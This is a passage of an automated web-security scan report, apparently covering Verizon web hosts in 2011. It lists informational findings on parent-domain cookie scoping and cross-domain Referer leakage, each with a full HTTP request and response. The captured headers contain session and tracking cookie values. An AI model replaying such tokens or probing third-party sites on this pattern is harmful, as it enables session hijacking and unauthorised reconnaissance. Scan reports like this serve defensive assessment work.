Accept-Ranges: bytes
ETag: "e8adcb114eeca1:111b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:04 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:27:04 GMT; path=/includes/; domain=verizon.com


14.95. https://www22.verizon.com/includes/cache/getwb31.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/cache/getwb31.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/cache/getwb31.asp?zip=10011 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ForgotUserIDPassword
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 683
Content-Type: text/javascript
Expires: Mon, 05 Sep 2011 22:28:18 GMT
Cache-Control: Private
Date: Mon, 05 Sep 2011 22:23:18 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:28:18 GMT; path=/includes/; domain=verizon.com


rewriteHTML('scbwbnotice','');
rewriteHTML('scbwblinktext','New York,&nbsp;NY&nbsp;10011');
rewriteHTML('scbwbicon','<a href=\'http://weather.weatherbug.com/NY/New York-weather.html?zcode=z6726&zi
...[SNIP]...

14.96. https://www22.verizon.com/includes/javascript/commonjs/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/commonjs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/commonjs/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 18981
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com


var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];

/* detect.js */

var agt=navigator.userAgent.toLowerCase();
va
...[SNIP]...

14.97. https://www22.verizon.com/includes/javascript/hbx.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/hbx.js/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/hbx.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:42 GMT
Content-Length: 16426
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:42 GMT; path=/includes/; domain=verizon.com


//hbx.js,HBX2.5,Copyright 1997 - 2008. Omniture, Inc. All Rights Reserved. Omniture is a registered trademark of Omniture, Inc. in the United States, Canada, Japan, and the European Community.
/*
...[SNIP]...

14.98. https://www22.verizon.com/includes/javascript/hbx_custom.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/hbx_custom.js/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/hbx_custom.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 19482
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com


if(typeof(ghfT)=='undefined'){var ghfT='noscb';}

function fObj(n,d){
   var p,i,x;if(!d)d=document;if((p=n.indexOf('?'))>0&&parent.frames.length){
   d=parent.frames[n.substring(p+1)].document;n=n.
...[SNIP]...

14.99. https://www22.verizon.com/includes/javascript/sitewise.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/sitewise.js/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/sitewise.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 10531
Date: Mon, 05 Sep 2011 22:21:59 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:59 GMT; path=/includes/; domain=verizon.com


// START OF SDC Advanced Tracking Code
// Copyright (c) 1996-2005 WebTrends Inc. All rights reserved.
// V8.0
// $DateTime: 2006/05/02 08:33:13 $

var gService = true;
var gTimeZone = -6;

...[SNIP]...

14.100. https://www22.verizon.com/vztracker/vzTracker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /vztracker/vzTracker.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vztracker/vzTracker.aspx?appName=ECSP_OLH&Type=2|A&requestUrl=javscrit%3AO_LC%28%29%3B&referrer=http%3A//www22.verizon.com/ResidentialHelp/Generic/Ask%2520Verizon/Getting%2520Started/124519.htm&Title=Feedbackfeedbacklink&id=2563991732895.3745 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; 
DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html
Expires: Mon, 05 Sep 2011 22:24:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:19 GMT
Content-Length: 909
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:29:19 GMT; path=/vztracker/; domain=verizon.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>vzTracker</title>
       <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
       <meta content="C#" na
...[SNIP]...

15. Cross-domain Referer leakage
There are 49 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


15.1. http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2870.vznbiz/B3160296

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N2870.vznbiz/B3160296;sz=300x300;ord=782085613? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/smb_portlets/myapplication_rp/smb_orbitz.jsp
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 40948
Date: Mon, 05 Sep 2011 22:36:03 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><html>
<head>

<style type=text/css>
#orbot { width: 300px; height: 300px; bo
...[SNIP]...
<td>
           <img src=http://s0.2mdn.net/836848/0806_inc_flights_on_red.gif><br>
...[SNIP]...
<a href=javascript:swapto('box2')><img src=http://s0.2mdn.net/836848/0806_inc_hotels_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box3')><img src=http://s0.2mdn.net/836848/0806_inc_cars_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box4')><img src=http://s0.2mdn.net/836848/0806_inc_packages_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box1')><img src=http://s0.2mdn.net/836848/0806_inc_flights_off_red.gif border=0></a><br>
       </td>
       <td>
           <img src=http://s0.2mdn.net/836848/0806_inc_hotels_on_red.gif><br>
...[SNIP]...
<a href=javascript:swapto('box3')><img src=http://s0.2mdn.net/836848/0806_inc_cars_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box4')><img src=http://s0.2mdn.net/836848/0806_inc_packages_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box1')><img src=http://s0.2mdn.net/836848/0806_inc_flights_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box2')><img src=http://s0.2mdn.net/836848/0806_inc_hotels_off_red.gif border=0></a><br>
       </td>
       <td>
           <img src=http://s0.2mdn.net/836848/0806_inc_cars_on_red.gif><br>
...[SNIP]...
<a href=javascript:swapto('box4')><img src=http://s0.2mdn.net/836848/0806_inc_packages_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box1')><img src=http://s0.2mdn.net/836848/0806_inc_flights_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box2')><img src=http://s0.2mdn.net/836848/0806_inc_hotels_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box3')><img src=http://s0.2mdn.net/836848/0806_inc_cars_off_red.gif border=0></a><br>
       </td>
       <td>
           <img src=http://s0.2mdn.net/836848/0806_inc_packages_on_red.gif><br>
...[SNIP]...
<td width=300 bgcolor=#ffffff><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=5><br>
...[SNIP]...
<td width=300 bgcolor=#aaa07d><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif><br>
...[SNIP]...
<td width=3><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=22><br>
...[SNIP]...
<td width=300 bgcolor=#aaa07d><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif><br>
...[SNIP]...
<td width=5 bgcolor="#FFFFFF"><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=10 height=225><br>
...[SNIP]...
<td width=285 valign=top bgcolor="#FFFFFF">
<img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20>
<table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=3>
                       <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20>
           <table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<span class=small><a href=http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp target=_blank onClick="return maxPopUp()">(up to 9)</a>
...[SNIP]...
<input type=hidden name="WT.mc_ev" value="click" />
           <img src=http://s0.2mdn.net/836848/lilshimmy.gif width=1 height=30>
           <table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width=219>
                       <img src=http://s0.2mdn.net/836848/0806_inc_logo_red.gif><br>
...[SNIP]...
<a href="javascript:fcheck('orbot', 'slice1:dateTime:date', 'slice2:dateTime:date')"><img src=http://s0.2mdn.net/836848/0806_inc_search_red.gif border=0></a>
...[SNIP]...
<td width=5 bgcolor=#ffffff><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=225><br>
...[SNIP]...
<td width=285 valign=top bgcolor=#ffffff>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20>
           <table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width=65>
                       <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif><span class=norm>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
<input type=hidden name="WT.mc_ev" value="click" />
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td width=219>
                       <img src=http://s0.2mdn.net/836848/0806_inc_logo_red.gif><br>
...[SNIP]...
<a href=submit onClick="fcheck('hotelsearchform', 'startDate', 'endDate'); return false;"><img src=http://s0.2mdn.net/836848/0806_inc_search_red.gif border=0></a>
...[SNIP]...
<td width=5 bgcolor=#ffffff><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=225><br>
...[SNIP]...
<td width=285 valign=top bgcolor=#ffffff>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
<input type=hidden name="WT.mc_ev" value="click" />
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td width=219>
                       <img src=http://s0.2mdn.net/836848/0806_inc_logo_red.gif><br>
...[SNIP]...
<a href=submit onClick="fcheck('carsearchform', 'startDate:date', 'endDate:date'); return false;"><img src=http://s0.2mdn.net/836848/0806_inc_search_red.gif border=0></a>
...[SNIP]...
<td width=5 bgcolor=#ffffff><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=196><br>
...[SNIP]...
<td width=285 valign=top bgcolor=#ffffff>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
<span class=small><a href=http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp target=_blank onClick="return maxPopUp()">(up to 4)</a>
